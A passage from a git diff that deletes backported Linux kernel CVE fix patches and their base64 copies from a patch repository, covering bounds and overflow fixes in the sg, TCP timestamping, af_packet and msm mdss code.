iaW5lcyBmdW5jdGlvbiBpZiB3cml0ZSgpIGFuZCByZWFkKCkKLQktIG5ldyBpbnRlcmZhY2UgKHNnX2lvX2hkcl90KSBidXQgc3RpbGwgc3VwcG9ydHMgb2xkIGludGVyZmFjZQotCS0gc2NhdHRlci9nYXRoZXIgaW4gdXNlciBzcGFjZSwgZGlyZWN0IElPLCBhbmQgbW1hcCBzdXBwb3J0ZWQKLQotIFRoZSBub3JtYWwgYWN0aW9uIG9mIHRoaXMgZHJpdmVyIGlzIHRvIHVzZSB0aGUgYWRhcHRlciAoSEJBKSBkcml2ZXIgdG8gRE1BCi0gZGF0YSBpbnRvIGtlcm5lbCBidWZmZXJzIGFuZCB0aGVuIHVzZSB0aGUgQ1BVIHRvIGNvcHkgdGhlIGRhdGEgaW50byB0aGUgCi0gdXNlciBzcGFjZSAodmljZSB2ZXJzYSBmb3Igd3JpdGVzKS4gVGhhdCBpcyBjYWxsZWQgImluZGlyZWN0IiBJTyBkdWUgdG8gCi0gdGhlIGRvdWJsZSBoYW5kbGluZyBvZiBkYXRhLiBUaGVyZSBhcmUgdHdvIG1ldGhvZHMgb2ZmZXJlZCB0byByZW1vdmUgdGhlCi0gcmVkdW5kYW50IGNvcHk6IDEpIGRpcmVjdCBJTyBhbmQgMikgdXNpbmcgdGhlIG1tYXAoKSBzeXN0ZW0gY2FsbCB0byBtYXAKLSB0aGUgcmVzZXJ2ZSBidWZmZXIgKHRoaXMgZHJpdmVyIGhhcyBvbmUgcmVzZXJ2ZSBidWZmZXIgcGVyIGZkKSBpbnRvIHRoZQotIHVzZXIgc3BhY2UuIEJvdGggaGF2ZSB0aGVpciBhZHZhbnRhZ2VzLgotIEluIHRlcm1zIG9mIGFic29sdXRlIHNwZWVkIG1tYXAoKSBpcyBmYXN0ZXIuIElmIHNwZWVkIGlzIG5vdCBhIGNvbmNlcm4sIAotIGluZGlyZWN0IElPIHNob3VsZCBiZSBmaW5lLiBSZWFkIHRoZSBkb2N1bWVudGF0aW9uIGZvciBtb3JlIGluZm9ybWF0aW9uLgotCi0gKiogTi5CLiBUbyB1c2UgZGlyZWN0IElPICdlY2hvIDEgPiAvcHJvYy9zY3NpL3NnL2FsbG93X2Rpbycgb3IKLSAgICAgICAgICdlY2hvIDEgPiAvc3lzL21vZHVsZS9zZy9wYXJhbWV0ZXJzL2FsbG93X2RpbycgaXMgbmVlZGVkLgotICAgICAgICAgVGhhdCBhdHRyaWJ1dGUgaXMgMCBieSBkZWZhdWx0LiAqKgotIAotIEhpc3RvcmljYWwgbm90ZTogdGhpcyBTQ1NJIHBhc3MtdGhyb3VnaCBkcml2ZXIgaGFzIGJlZW4ga25vd24gYXMgInNnIiBmb3IgCi0gYSBkZWNhZGUuIEluIGJyb2FkZXIga2VybmVsIGRpc2N1c3Npb25zICJzZyIgaXMgdXNlZCB0byByZWZlciB0byBzY2F0dGVyCi0gZ2F0aGVyIHRlY2huaXF1ZXMuIFRoZSBjb250ZXh0IHNob3VsZCBjbGFyaWZ5IHdoaWNoICJzZyIgaXMgcmVmZXJyZWQgdG8uCi0KLSBEb2N1bWVudGF0aW9uCi0gPT09PT09PT09PT09PQotIEEgd2ViIHNpdGUgZm9yIHRoZSBTRyBkZXZpY2UgZHJpdmVyIGNhbiBiZSBmb3VuZCBhdDoKLQlodHRwOi8vd3d3LnRvcnF1ZS5uZXQvc2cgIFthbHRlcm5hdGl2ZWx5IGNoZWNrIHRoZSBNQUlOVEFJTkVSUyBmaWxlXQotIFRoZSBkb2N1bWVudGF0aW9uIGZvciB0aGUgc2cgdmVyc2lvbiAzIGRyaXZlciBjYW4gYmUgZm91bmQgYXQ6Ci0gCWh0dHA6Ly93d3cudG9ycXVlLm5ldC9zZy9wL3NnX3YzX2hvLmh0bWwKLSBUaGlzIGlzIGEgcmVuZGVyaW5nIGZyb20gRG9jQm9vayBzb3VyY2UgW2NoYW5nZSB0aGUgZXh0ZW5zaW9uIHRvICJzZ21sIgotIG9yICJ4bWwiXS4gVGhlcmUgYXJlIHJlbmRlcmluZ3MgaW4gInBzIiwgInBkZiIsICJydGYiIGFuZCAidHh0IiAoc29vbikuCi0gVGhlIFNHX0lPIGlvY3RsIGlzIG5vdyBmb3VuZCBpbiBvdGhlciBwYXJ0cyBrZXJuZWwgKGUuZy4gdGhlIGJsb2NrIGxheWVyKS4KLSBGb3IgbW9yZSBpbmZvcm1hdGlvbiBzZWUgaHR0cDovL3d3dy50b3JxdWUubmV0L3NnL3NnX2lvLmh0bWwKLQotIFRoZSBvbGRlciwgdmVyc2lvbiAyIGRvY3VtZW50cyBkaXNjdXNzIHRoZSBvcmlnaW5hbCBzZyBpbnRlcmZhY2UgaW4gZGV0YWlsOgotCWh0dHA6Ly93d3cudG9ycXVlLm5ldC9zZy9wL3Njc2ktZ2VuZXJpYy50eHQKLQlodHRwOi8vd3d3LnRvcnF1ZS5uZXQvc2cvcC9zY3NpLWdlbmVyaWNfbG9uZy50eHQKLSBBbHNvIGF2YWlsYWJsZTogPGtlcm5lbF9zb3VyY2U+L0RvY3VtZW50YXRpb24vc2NzaS9zY3NpLWdlbmVyaWMudHh0Ci0KLSBVdGlsaXR5IGFuZCB0ZXN0IHByb2dyYW1zIGFyZSBhdmFpbGFibGUgYXQgdGhlIHNnIHdlYiBzaXRlLiBUaGV5IGFyZSAKLSBwYWNrYWdlZCBhcyBzZzNfdXRpbHMgKGZvciB0aGUgbGsgMi40IGFuZCAyLjYgc2VyaWVzKSBhbmQgc2dfdXRpbHMKLSAoZm9yIHRoZSBsayAyLjIgc2VyaWVzKS4KLSovCisgKiBIaXN0b3J5OgorICogIFN0YXJ0ZWQ6IEF1ZyA5IGJ5IExhd3JlbmNlIEZvYXJkIChlbnRyb3B5QHdvcmxkLnN0ZC5jb20pLCB0byBhbGxvdyB1c2VyCisgKiAgIHByb2Nlc3MgY29udHJvbCBvZiBTQ1NJIGRldmljZXMuCisgKiAgRGV2ZWxvcG1lbnQgU3BvbnNvcmVkIGJ5IEtpbGx5IENvcnAuIE5ZIE5ZCisgKgorICogT3JpZ2luYWwgZHJpdmVyIChzZy5oKToKKyAqICAgICAgIENvcHlyaWdodCAoQykgMTk5MiBMYXdyZW5jZSBGb2FyZAorICogVmVyc2lvbiAyIGFuZCAzIGV4dGVuc2lvbnMgdG8gZHJpdmVyOgorICoJQ29weXJpZ2h0IChDKSAxOTk4IC0gMjAxNCBEb3VnbGFzIEdpbGJlcnQKKyAqCisgKiAgVmVyc2lvbjogMy41LjM2ICgyMDE0MDYwMykKKyAqICBUaGlzIHZlcnNpb24gaXMgZm9yIDIuNiBhbmQgMyBzZXJpZXMga2VybmVscy4KKyAqCisgKiBEb2N1bWVudGF0aW9uCisgKiA9PT09PT09PT09PT09CisgKiBBIHdlYiBzaXRlIGZvciB0aGUgU0cgZGV2aWNlIGRyaXZlciBjYW4gYmUgZm91bmQgYXQ6CisgKglodHRwOi8vc2cuZGFubnkuY3ovc2cgIFthbHRlcm5hdGl2ZWx5IGNoZWNrIHRoZSBNQUlOVEFJTkVSUyBmaWxlXQorICogVGhlIGRvY3VtZW50YXRpb24gZm9yIHRoZSBzZyB2ZXJzaW9uIDMgZHJpdmVyIGNhbiBiZSBmb3VuZCBhdDoKKyAqCWh0dHA6Ly9zZy5kYW5ueS5jei9zZy9wL3NnX3YzX2hvLmh0bWwKKyAqIEFsc28gc2VlOiA8a2VybmVsX3NvdXJjZT4vRG9jdW1lbnRhdGlvbi9zY3NpL3Njc2ktZ2VuZXJpYy50eHQKKyAqCisgKiBGb3IgdXRpbGl0eSBhbmQgdGVzdCBwcm9ncmFtcyBzZWU6IGh0dHA6Ly9zZy5kYW5ueS5jei9zZy9zZzNfdXRpbHMuaHRtbAorICovCiAKICNpZmRlZiBfX0tFUk5FTF9fCiBleHRlcm4gaW50IHNnX2JpZ19idWZmOyAvKiBmb3Igc3lzY3RsICovCiAjZW5kaWYKIAotLyogTmV3IGludGVyZmFjZSBpbnRyb2R1Y2VkIGluIHRoZSAzLnggU0cgZHJpdmVycyBmb2xsb3dzICovCiAKIHR5cGVkZWYgc3RydWN0IHNnX2lvdmVjIC8qIHNhbWUgc3RydWN0dXJlIGFzIHVzZWQgYnkgcmVhZHYoKSBMaW51eCBzeXN0ZW0gKi8KIHsgICAgICAgICAgICAgICAgICAgICAgIC8qIGNhbGwuIEl0IGRlZmluZXMgb25lIHNjYXR0ZXItZ2F0aGVyIGVsZW1lbnQuICovCkBAIC04Nyw3ICs0NCw3IEBACiB7CiAgICAgaW50IGludGVyZmFjZV9pZDsgICAgICAgICAgIC8qIFtpXSAnUycgZm9yIFNDU0kgZ2VuZXJpYyAocmVxdWlyZWQpICovCiAgICAgaW50IGR4ZmVyX2RpcmVjdGlvbjsgICAgICAgIC8qIFtpXSBkYXRhIHRyYW5zZmVyIGRpcmVjdGlvbiAgKi8KLSAgICB1bnNpZ25lZCBjaGFyIGNtZF9sZW47ICAgICAgLyogW2ldIFNDU0kgY29tbWFuZCBsZW5ndGggKCA8PSAxNiBieXRlcykgKi8KKyAgICB1bnNpZ25lZCBjaGFyIGNtZF9sZW47ICAgICAgLyogW2ldIFNDU0kgY29tbWFuZCBsZW5ndGggKi8KICAgICB1bnNpZ25lZCBjaGFyIG14X3NiX2xlbjsgICAgLyogW2ldIG1heCBsZW5ndGggdG8gd3JpdGUgdG8gc2JwICovCiAgICAgdW5zaWduZWQgc2hvcnQgaW92ZWNfY291bnQ7IC8qIFtpXSAwIGltcGxpZXMgbm8gc2NhdHRlciBnYXRoZXIgKi8KICAgICB1bnNpZ25lZCBpbnQgZHhmZXJfbGVuOyAgICAgLyogW2ldIGJ5dGUgY291bnQgb2YgZGF0YSB0cmFuc2ZlciAqLwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch
deleted file mode 100644
index 5bf99fee..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch
+++ /dev/null
@@ -1,29 +0,0 @@
-From c38b9d2d38678815745eae28512a03d5e1a3dcf1 Mon Sep 17 00:00:00 2001
-From: peter chang <dpf@google.com>
-Date: Wed, 15 Feb 2017 14:11:54 -0800
-Subject: [PATCH] scsi: sg: check length passed to SG_NEXT_CMD_LEN
-
-The user can control the size of the next command passed along, but the
-value passed to the ioctl isn't checked against the usable max command
-size.
-
-Change-Id: Icbb33a63776954de662eb858ede300fbcb3710f4
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Peter Chang <dpf@google.com>
-Acked-by: Douglas Gilbert <dgilbert@interlog.com>
-Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
----
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 56178bc..84f5a76 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -959,6 +959,8 @@
- 		result = get_user(val, ip);
- 		if (result)
- 			return result;
-+		if (val > SG_MAX_CDB_SIZE)
-+			return -ENOMEM;
- 		sfp->next_cmd_len = (val > 0) ? val : 0;
- 		return 0;
- 	case SG_GET_VERSION_NUM:
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch.base64
deleted file mode 100644
index fafd941c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBjMzhiOWQyZDM4Njc4ODE1NzQ1ZWFlMjg1MTJhMDNkNWUxYTNkY2YxIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBwZXRlciBjaGFuZyA8ZHBmQGdvb2dsZS5jb20+CkRhdGU6IFdlZCwgMTUgRmViIDIwMTcgMTQ6MTE6NTQgLTA4MDAKU3ViamVjdDogW1BBVENIXSBzY3NpOiBzZzogY2hlY2sgbGVuZ3RoIHBhc3NlZCB0byBTR19ORVhUX0NNRF9MRU4KClRoZSB1c2VyIGNhbiBjb250cm9sIHRoZSBzaXplIG9mIHRoZSBuZXh0IGNvbW1hbmQgcGFzc2VkIGFsb25nLCBidXQgdGhlCnZhbHVlIHBhc3NlZCB0byB0aGUgaW9jdGwgaXNuJ3QgY2hlY2tlZCBhZ2FpbnN0IHRoZSB1c2FibGUgbWF4IGNvbW1hbmQKc2l6ZS4KCkNoYW5nZS1JZDogSWNiYjMzYTYzNzc2OTU0ZGU2NjJlYjg1OGVkZTMwMGZiY2IzNzEwZjQKQ2M6IDxzdGFibGVAdmdlci5rZXJuZWwub3JnPgpTaWduZWQtb2ZmLWJ5OiBQZXRlciBDaGFuZyA8ZHBmQGdvb2dsZS5jb20+CkFja2VkLWJ5OiBEb3VnbGFzIEdpbGJlcnQgPGRnaWxiZXJ0QGludGVybG9nLmNvbT4KU2lnbmVkLW9mZi1ieTogTWFydGluIEsuIFBldGVyc2VuIDxtYXJ0aW4ucGV0ZXJzZW5Ab3JhY2xlLmNvbT4KLS0tCgpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL3NnLmMgYi9kcml2ZXJzL3Njc2kvc2cuYwppbmRleCA1NjE3OGJjLi44NGY1YTc2IDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvc2cuYworKysgYi9kcml2ZXJzL3Njc2kvc2cuYwpAQCAtOTU5LDYgKzk1OSw4IEBACiAJCXJlc3VsdCA9IGdldF91c2VyKHZhbCwgaXApOwogCQlpZiAocmVzdWx0KQogCQkJcmV0dXJuIHJlc3VsdDsKKwkJaWYgKHZhbCA+IFNHX01BWF9DREJfU0laRSkKKwkJCXJldHVybiAtRU5PTUVNOwogCQlzZnAtPm5leHRfY21kX2xlbiA9ICh2YWwgPiAwKSA/IHZhbCA6IDA7CiAJCXJldHVybiAwOwogCWNhc2UgU0dfR0VUX1ZFUlNJT05fTlVNOgo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0001.patch
deleted file mode 100644
index 9d45f459..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0001.patch
+++ /dev/null
@@ -1,121 +0,0 @@
-From 4ef1b2869447411ad3ef91ad7d4891a83c1a509a Mon Sep 17 00:00:00 2001
-From: Soheil Hassas Yeganeh <soheil@google.com>
-Date: Sat, 18 Mar 2017 17:03:00 -0400
-Subject: tcp: mark skbs with SCM_TIMESTAMPING_OPT_STATS
-
-SOF_TIMESTAMPING_OPT_STATS can be enabled and disabled
-while packets are collected on the error queue.
-So, checking SOF_TIMESTAMPING_OPT_STATS in sk->sk_tsflags
-is not enough to safely assume that the skb contains
-OPT_STATS data.
-
-Add a bit in sock_exterr_skb to indicate whether the
-skb contains opt_stats data.
-
-Fixes: 1c885808e456 ("tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING")
-Reported-by: JongHwan Kim <zzoru007@gmail.com>
-Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: Willem de Bruijn <willemb@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- include/linux/errqueue.h |  2 ++
- net/core/skbuff.c        | 17 +++++++++++------
- net/socket.c             |  2 +-
- 3 files changed, 14 insertions(+), 7 deletions(-)
-
-diff --git a/include/linux/errqueue.h b/include/linux/errqueue.h
-index 9ca23fc..6fdfc88 100644
---- a/include/linux/errqueue.h
-+++ b/include/linux/errqueue.h
-@@ -20,6 +20,8 @@ struct sock_exterr_skb {
- 	struct sock_extended_err	ee;
- 	u16				addr_offset;
- 	__be16				port;
-+	u8				opt_stats:1,
-+					unused:7;
- };
- 
- #endif
-diff --git a/net/core/skbuff.c b/net/core/skbuff.c
-index b1fbd19..9f78109 100644
---- a/net/core/skbuff.c
-+++ b/net/core/skbuff.c
-@@ -3793,16 +3793,20 @@ EXPORT_SYMBOL(skb_clone_sk);
- 
- static void __skb_complete_tx_timestamp(struct sk_buff *skb,
- 					struct sock *sk,
--					int tstype)
-+					int tstype,
-+					bool opt_stats)
- {
- 	struct sock_exterr_skb *serr;
- 	int err;
- 
-+	BUILD_BUG_ON(sizeof(struct sock_exterr_skb) > sizeof(skb->cb));
-+
- 	serr = SKB_EXT_ERR(skb);
- 	memset(serr, 0, sizeof(*serr));
- 	serr->ee.ee_errno = ENOMSG;
- 	serr->ee.ee_origin = SO_EE_ORIGIN_TIMESTAMPING;
- 	serr->ee.ee_info = tstype;
-+	serr->opt_stats = opt_stats;
- 	if (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID) {
- 		serr->ee.ee_data = skb_shinfo(skb)->tskey;
- 		if (sk->sk_protocol == IPPROTO_TCP &&
-@@ -3843,7 +3847,7 @@ void skb_complete_tx_timestamp(struct sk_buff *skb,
- 	 */
- 	if (likely(atomic_inc_not_zero(&sk->sk_refcnt))) {
- 		*skb_hwtstamps(skb) = *hwtstamps;
--		__skb_complete_tx_timestamp(skb, sk, SCM_TSTAMP_SND);
-+		__skb_complete_tx_timestamp(skb, sk, SCM_TSTAMP_SND, false);
- 		sock_put(sk);
- 	}
- }
-@@ -3854,7 +3858,7 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
- 		     struct sock *sk, int tstype)
- {
- 	struct sk_buff *skb;
--	bool tsonly;
-+	bool tsonly, opt_stats = false;
- 
- 	if (!sk)
- 		return;
-@@ -3867,9 +3871,10 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
- #ifdef CONFIG_INET
- 		if ((sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS) &&
- 		    sk->sk_protocol == IPPROTO_TCP &&
--		    sk->sk_type == SOCK_STREAM)
-+		    sk->sk_type == SOCK_STREAM) {
- 			skb = tcp_get_timestamping_opt_stats(sk);
--		else
-+			opt_stats = true;
-+		} else
- #endif
- 			skb = alloc_skb(0, GFP_ATOMIC);
- 	} else {
-@@ -3888,7 +3893,7 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
- 	else
- 		skb->tstamp = ktime_get_real();
- 
--	__skb_complete_tx_timestamp(skb, sk, tstype);
-+	__skb_complete_tx_timestamp(skb, sk, tstype, opt_stats);
- }
- EXPORT_SYMBOL_GPL(__skb_tstamp_tx);
- 
-diff --git a/net/socket.c b/net/socket.c
-index 692d698..985ef06 100644
---- a/net/socket.c
-+++ b/net/socket.c
-@@ -706,7 +706,7 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk,
- 			 SCM_TIMESTAMPING, sizeof(tss), &tss);
- 
- 		if (skb_is_err_queue(skb) && skb->len &&
--		    (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS))
-+		    SKB_EXT_ERR(skb)->opt_stats)
- 			put_cmsg(msg, SOL_SOCKET, SCM_TIMESTAMPING_OPT_STATS,
- 				 skb->len, skb->data);
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0002.patch
deleted file mode 100644
index 85f41260..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7277/^4.10/0002.patch
+++ /dev/null
@@ -1,95 +0,0 @@
-From 8605330aac5a5785630aec8f64378a54891937cc Mon Sep 17 00:00:00 2001
-From: Soheil Hassas Yeganeh <soheil@google.com>
-Date: Sat, 18 Mar 2017 17:02:59 -0400
-Subject: tcp: fix SCM_TIMESTAMPING_OPT_STATS for normal skbs
-
-__sock_recv_timestamp can be called for both normal skbs (for
-receive timestamps) and for skbs on the error queue (for transmit
-timestamps).
-
-Commit 1c885808e456
-(tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING)
-assumes any skb passed to __sock_recv_timestamp are from
-the error queue, containing OPT_STATS in the content of the skb.
-This results in accessing invalid memory or generating junk
-data.
-
-To fix this, set skb->pkt_type to PACKET_OUTGOING for packets
-on the error queue. This is safe because on the receive path
-on local sockets skb->pkt_type is never set to PACKET_OUTGOING.
-With that, copy OPT_STATS from a packet, only if its pkt_type
-is PACKET_OUTGOING.
-
-Fixes: 1c885808e456 ("tcp: SOF_TIMESTAMPING_OPT_STATS option for SO_TIMESTAMPING")
-Reported-by: JongHwan Kim <zzoru007@gmail.com>
-Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: Willem de Bruijn <willemb@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/core/skbuff.c | 10 ++++++++++
- net/socket.c      | 13 ++++++++++++-
- 2 files changed, 22 insertions(+), 1 deletion(-)
-
-diff --git a/net/core/skbuff.c b/net/core/skbuff.c
-index cd4ba8c..b1fbd19 100644
---- a/net/core/skbuff.c
-+++ b/net/core/skbuff.c
-@@ -3694,6 +3694,15 @@ static void sock_rmem_free(struct sk_buff *skb)
- 	atomic_sub(skb->truesize, &sk->sk_rmem_alloc);
- }
- 
-+static void skb_set_err_queue(struct sk_buff *skb)
-+{
-+	/* pkt_type of skbs received on local sockets is never PACKET_OUTGOING.
-+	 * So, it is safe to (mis)use it to mark skbs on the error queue.
-+	 */
-+	skb->pkt_type = PACKET_OUTGOING;
-+	BUILD_BUG_ON(PACKET_OUTGOING == 0);
-+}
-+
- /*
-  * Note: We dont mem charge error packets (no sk_forward_alloc changes)
-  */
-@@ -3707,6 +3716,7 @@ int sock_queue_err_skb(struct sock *sk, struct sk_buff *skb)
- 	skb->sk = sk;
- 	skb->destructor = sock_rmem_free;
- 	atomic_add(skb->truesize, &sk->sk_rmem_alloc);
-+	skb_set_err_queue(skb);
- 
- 	/* before exiting rcu section, make sure dst is refcounted */
- 	skb_dst_force(skb);
-diff --git a/net/socket.c b/net/socket.c
-index e034fe4..692d698 100644
---- a/net/socket.c
-+++ b/net/socket.c
-@@ -652,6 +652,16 @@ int kernel_sendmsg(struct socket *sock, struct msghdr *msg,
- }
- EXPORT_SYMBOL(kernel_sendmsg);
- 
-+static bool skb_is_err_queue(const struct sk_buff *skb)
-+{
-+	/* pkt_type of skbs enqueued on the error queue are set to
-+	 * PACKET_OUTGOING in skb_set_err_queue(). This is only safe to do
-+	 * in recvmsg, since skbs received on a local socket will never
-+	 * have a pkt_type of PACKET_OUTGOING.
-+	 */
-+	return skb->pkt_type == PACKET_OUTGOING;
-+}
-+
- /*
-  * called from sock_recv_timestamp() if sock_flag(sk, SOCK_RCVTSTAMP)
-  */
-@@ -695,7 +705,8 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk,
- 		put_cmsg(msg, SOL_SOCKET,
- 			 SCM_TIMESTAMPING, sizeof(tss), &tss);
- 
--		if (skb->len && (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS))
-+		if (skb_is_err_queue(skb) && skb->len &&
-+		    (sk->sk_tsflags & SOF_TIMESTAMPING_OPT_STATS))
- 			put_cmsg(msg, SOL_SOCKET, SCM_TIMESTAMPING_OPT_STATS,
- 				 skb->len, skb->data);
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7308/ANY/0001.patch
deleted file mode 100644
index 1992f96b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 2b6867c2ce76c596676bec7d2d525af525fdc6e2 Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov <andreyknvl@google.com>
-Date: Wed, 29 Mar 2017 16:11:20 +0200
-Subject: net/packet: fix overflow in check for priv area size
-
-Subtracting tp_sizeof_priv from tp_block_size and casting to int
-to check whether one is less then the other doesn't always work
-(both of them are unsigned ints).
-
-Compare them as is instead.
-
-Also cast tp_sizeof_priv to u64 before using BLK_PLUS_PRIV, as
-it can overflow inside BLK_PLUS_PRIV otherwise.
-
-Signed-off-by: Andrey Konovalov <andreyknvl@google.com>
-Acked-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/packet/af_packet.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index a0dbe7c..2323ee3 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -4193,8 +4193,8 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
- 		if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
- 			goto out;
- 		if (po->tp_version >= TPACKET_V3 &&
--		    (int)(req->tp_block_size -
--			  BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
-+		    req->tp_block_size <=
-+			  BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv))
- 			goto out;
- 		if (unlikely(req->tp_frame_size < po->tp_hdrlen +
- 					po->tp_reserve))
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-7308/ANY/0002.patch
deleted file mode 100644
index d856dfa0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0002.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 8f8d28e4d6d815a391285e121c3a53a0b6cb9e7b Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov <andreyknvl@google.com>
-Date: Wed, 29 Mar 2017 16:11:21 +0200
-Subject: net/packet: fix overflow in check for tp_frame_nr
-
-When calculating rb->frames_per_block * req->tp_block_nr the result
-can overflow.
-
-Add a check that tp_block_size * tp_block_nr <= UINT_MAX.
-
-Since frames_per_block <= tp_block_size, the expression would
-never overflow.
-
-Signed-off-by: Andrey Konovalov <andreyknvl@google.com>
-Acked-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/packet/af_packet.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index 2323ee3..3ac286e 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -4205,6 +4205,8 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
- 		rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
- 		if (unlikely(rb->frames_per_block == 0))
- 			goto out;
-+		if (unlikely(req->tp_block_size > UINT_MAX / req->tp_block_nr))
-+			goto out;
- 		if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
- 					req->tp_frame_nr))
- 			goto out;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-7308/ANY/0003.patch
deleted file mode 100644
index 8065045a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7308/ANY/0003.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From bcc5364bdcfe131e6379363f089e7b4108d35b70 Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov <andreyknvl@google.com>
-Date: Wed, 29 Mar 2017 16:11:22 +0200
-Subject: net/packet: fix overflow in check for tp_reserve
-
-When calculating po->tp_hdrlen + po->tp_reserve the result can overflow.
-
-Fix by checking that tp_reserve <= INT_MAX on assign.
-
-Signed-off-by: Andrey Konovalov <andreyknvl@google.com>
-Acked-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/packet/af_packet.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index 3ac286e..8489bef 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -3665,6 +3665,8 @@ packet_setsockopt(struct socket *sock, int level, int optname, char __user *optv
- 			return -EBUSY;
- 		if (copy_from_user(&val, optval, sizeof(val)))
- 			return -EFAULT;
-+		if (val > INT_MAX)
-+			return -EINVAL;
- 		po->tp_reserve = val;
- 		return 0;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7364/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7364/ANY/0001.patch
deleted file mode 100644
index be2c9551..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7364/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 3ce6c47d2142fcd2c4c1181afe08630aaae5a267 Mon Sep 17 00:00:00 2001
-From: Harsh Sahu <hsahu@codeaurora.org>
-Date: Thu, 16 Feb 2017 19:52:02 -0800
-Subject: msm : mdss: Avoid arbitrary free of scale_data in error condition
-
-In mdss_fb_copy_destscaler_data function when the code enters error
-section it may free up some arbitrary kernel address. This may
-generate security vulnerability. Hence fixed the loop condition in
-err: to real count of allocated buffer to avoid this arbitrary free.
-
-Change-Id: I4014a3bf9cb0f5da994fa5c0233b7940009be0cd
-Signed-off-by: Harsh Sahu <hsahu@codeaurora.org>
----
- drivers/video/fbdev/msm/mdss_fb.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/fbdev/msm/mdss_fb.c b/drivers/video/fbdev/msm/mdss_fb.c
-index a183fd7..5eab4a5 100644
---- a/drivers/video/fbdev/msm/mdss_fb.c
-+++ b/drivers/video/fbdev/msm/mdss_fb.c
-@@ -4471,7 +4471,7 @@ err:
- static int __mdss_fb_copy_destscaler_data(struct fb_info *info,
- 		struct mdp_layer_commit *commit)
- {
--	int    i;
-+	int    i = 0;
- 	int    ret = 0;
- 	u32    data_size;
